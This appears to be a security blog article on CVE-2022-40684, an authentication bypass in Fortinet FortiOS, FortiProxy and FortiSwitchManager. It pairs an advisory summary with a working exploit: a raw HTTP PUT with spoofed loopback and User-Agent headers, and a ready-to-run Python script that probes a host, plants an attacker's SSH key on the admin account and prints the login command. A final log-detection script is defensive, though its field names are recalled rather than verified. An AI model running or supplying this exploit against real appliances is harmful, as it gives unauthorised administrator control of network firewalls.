New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager
Fortinet recently patched a critical authentication bypass in the administrative interface of FortiOS, FortiProxy, and FortiSwitchManager (CVE-2022-40684, Fortinet PSIRT advisory FG-IR-22-377).
An unauthenticated attacker who can reach the management interface can send specially crafted HTTP or HTTPS requests and perform operations as an administrator, including changing the device configuration. Affected are FortiOS 7.0.0 to 7.0.6 and 7.2.0 to 7.2.1, FortiProxy 7.0.0 to 7.0.6 and 7.2.0, and FortiSwitchManager 7.0.0 and 7.2.0; the fix shipped in FortiOS 7.0.7 and 7.2.2, FortiProxy 7.0.7 and 7.2.1, and FortiSwitchManager 7.2.1. Until a device is upgraded, the vendor workaround is to disable the HTTP/HTTPS administrative interface or to restrict who can reach it with a local-in policy.
In this article, using FortiOS 7.2.1 as the example, we show how an attacker exploits it.
PoC
Let's look at how the vulnerability works. The REST API under /api/v2/ skips authentication for requests it believes come from a local Fortinet process, and it decides that from two headers the client controls: a Forwarded header whose for= field names a loopback address, and a User-Agent matching a trusted internal client ("Report Runner" in the request below; "Node.js" works as well). Any request carrying both is handled with administrator privileges and no session or credentials. The request below uses that to add an SSH public key to the built-in admin account; the attacker then logs in over SSH as admin with the matching private key. Because the bypass covers the whole CMDB API, the same headers let an attacker read or modify any other configuration object, not just the admin table.
    PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
    Host: 192.168.10.66
    User-Agent: Report Runner
    Content-Type: application/json
    Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
    Content-Length: 606

    {
      "ssh-public-key1": "\"ssh-rsa <base64-encoded public key> <key comment>\""
    }

Note the nested quotes: the CMDB stores the key as a quoted string, so the JSON string value itself begins and ends with an escaped double quote. Content-Length must match the actual body you send.
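The following script wraps the request above so it can be reproduced in a lab. It is an added example written for this article, not HORIZON3.ai's PoC. It builds the PUT exactly as shown (the quoting of the key value is the part people get wrong) and adds a read-only check that generalises the page's request: a GET on the same CMDB path with the spoofed headers, which any /api/v2/cmdb/ object would answer the same way. The host, key file, and the assumption that a patched build answers the unauthenticated GET with 401 or 403 are the editor's, not taken from the page.

```python
"""Reproduce the CVE-2022-40684 request above (added example, not HORIZON3.ai's PoC).

The bypass needs no credentials, only the two spoofed headers. Besides the PUT
that plants an SSH key, a read-only GET on the same CMDB path serves as a
non-destructive check. How a patched build answers that GET (401/403) is an
assumption about the appliance, not something shown in the article.
"""
import json
import ssl
import urllib.request
from urllib.error import HTTPError

# Header values copied from the request above. The ports are arbitrary; the
# loopback address in Forwarded: and the trusted User-Agent are what matter.
SPOOF_HEADERS = {
    "User-Agent": "Report Runner",
    "Forwarded": 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";',
}

ADMIN_PATH = "/api/v2/cmdb/system/admin"


def build_admin_key_update(pubkey: str, admin: str = "admin"):
    """Return (path, headers, body) for the PUT that plants an SSH key.

    The CMDB stores the key as a quoted string, so the JSON value itself
    contains the quotes: "\"ssh-rsa AAAA... comment\"".
    """
    path = f"{ADMIN_PATH}/{admin}"
    body = json.dumps({"ssh-public-key1": f'"{pubkey}"'}).encode()
    headers = dict(SPOOF_HEADERS)
    headers["Content-Type"] = "application/json"
    headers["Content-Length"] = str(len(body))
    return path, headers, body


def _insecure_ctx() -> ssl.SSLContext:
    # Appliances usually present a self-signed certificate on the management
    # interface; verification is disabled only for this lab request.
    return ssl._create_unverified_context()


def is_vulnerable(host: str, timeout: float = 5.0) -> bool:
    """Read-only check: fetch the admin table with the spoofed headers.

    HTTP 200 means the API accepted us as a trusted local process.
    Assumption: a patched build rejects the request with 401 or 403.
    """
    req = urllib.request.Request(f"https://{host}{ADMIN_PATH}",
                                 headers=SPOOF_HEADERS, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=_insecure_ctx()) as resp:
            return resp.status == 200
    except HTTPError as e:
        if e.code in (401, 403):
            return False
        raise


def plant_ssh_key(host: str, pubkey: str, admin: str = "admin", timeout: float = 5.0) -> int:
    """Send the PUT from the article and return the HTTP status code."""
    path, headers, body = build_admin_key_update(pubkey, admin)
    req = urllib.request.Request(f"https://{host}{path}", data=body,
                                 headers=headers, method="PUT")
    with urllib.request.urlopen(req, timeout=timeout, context=_insecure_ctx()) as resp:
        return resp.status


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        sys.exit("usage: cve-2022-40684.py <host> <path to id_rsa.pub> [admin user]")
    target, pubfile = sys.argv[1], sys.argv[2]
    user = sys.argv[3] if len(sys.argv) > 3 else "admin"
    if not is_vulnerable(target):
        sys.exit(f"{target}: spoofed request rejected, looks patched")
    with open(pubfile) as f:
        key = f.read().strip()
    print(f"{target}: vulnerable, PUT returned {plant_ssh_key(target, key, user)}")
    print(f"now log in with: ssh -i <matching private key> {user}@{target}")
```

Run the check first; it touches nothing on the device. Only test against systems you are authorised to assess.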
The PoC was published by HORIZON3.ai and can be downloaded from them. Thanks to HORIZON3.ai for the PoC.
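For the defender's side, here is a small log check to pair with the PoC. It is an added example, not from the article or from HORIZON3.ai. FortiOS records configuration changes as key=value event logs, and a change made through the bypass is attributed to a pseudo-user rather than to a real administrator. The field names and values used here (user="Local_Process_Access" together with ui="Node.js" or ui="Report Runner") follow the indicators Fortinet published for this CVE as the editor recalls them and should be verified against your own device's log format; the sample lines are constructed, not real device logs.

```python
"""Flag FortiOS config-change logs that match the CVE-2022-40684 bypass.

Added example (not from the article or HORIZON3.ai). Requests accepted through
the bypass are logged under a pseudo-user instead of a named administrator,
so the detection keys on that pseudo-user combined with one of the two
trusted User-Agent strings. Field names follow Fortinet's published
indicators as recalled here; confirm them against your own logs.
"""
import re

# key=value or key="quoted value" tokens, as FortiOS emits them
LOG_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Pseudo-user logged for requests treated as local process access, and the
# User-Agent strings the vulnerable check trusts (assumed indicator set).
LOCAL_PROCESS_USER = "Local_Process_Access"
TRUSTED_AGENTS = {"Node.js", "Report Runner"}

# Constructed sample lines (not real device logs). Line 1 is a normal edit
# from the GUI; lines 2 and 3 mimic the PoC's PUT arriving via the bypass.
SAMPLE_LOGS = [
    'date=2022-10-12 time=10:01:02 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="admin" ui="GUI(192.168.10.5)" '
    'action="Edit" cfgpath="system.admin" cfgobj="admin" cfgattr="ssh-public-key1[]" '
    'msg="Edit system.admin admin"',
    'date=2022-10-12 time=10:07:41 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="Local_Process_Access" ui="Node.js" '
    'action="Edit" cfgpath="system.admin" cfgobj="admin" cfgattr="ssh-public-key1[]" '
    'msg="Edit system.admin admin"',
    'date=2022-10-12 time=10:09:03 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="Local_Process_Access" ui="Report Runner" '
    'action="Edit" cfgpath="system.admin" cfgobj="admin" cfgattr="ssh-public-key1[]" '
    'msg="Edit system.admin admin"',
]


def parse_fortios_log(line: str) -> dict:
    """Split one key=value log line into a dict, with quotes removed."""
    return {key: quoted or bare for key, quoted, bare in LOG_KV.findall(line)}


def is_bypass_indicator(entry: dict) -> bool:
    """True when the entry carries the pseudo-user plus a trusted agent string."""
    return (entry.get("user") == LOCAL_PROCESS_USER
            and entry.get("ui") in TRUSTED_AGENTS)


def find_bypass_events(lines):
    """Return the parsed entries that match the indicator."""
    hits = []
    for line in lines:
        entry = parse_fortios_log(line)
        if is_bypass_indicator(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_bypass_events(SAMPLE_LOGS):
        print(f'{hit["date"]} {hit["time"]} ui={hit["ui"]!r} '
              f'{hit["action"]} {hit["cfgpath"]} {hit["cfgobj"]} {hit["cfgattr"]}')
```

Any hit on a real device deserves a look at which admin accounts and SSH keys exist, since the bypass can also have been used to create accounts or read configuration without leaving an edit on the admin table.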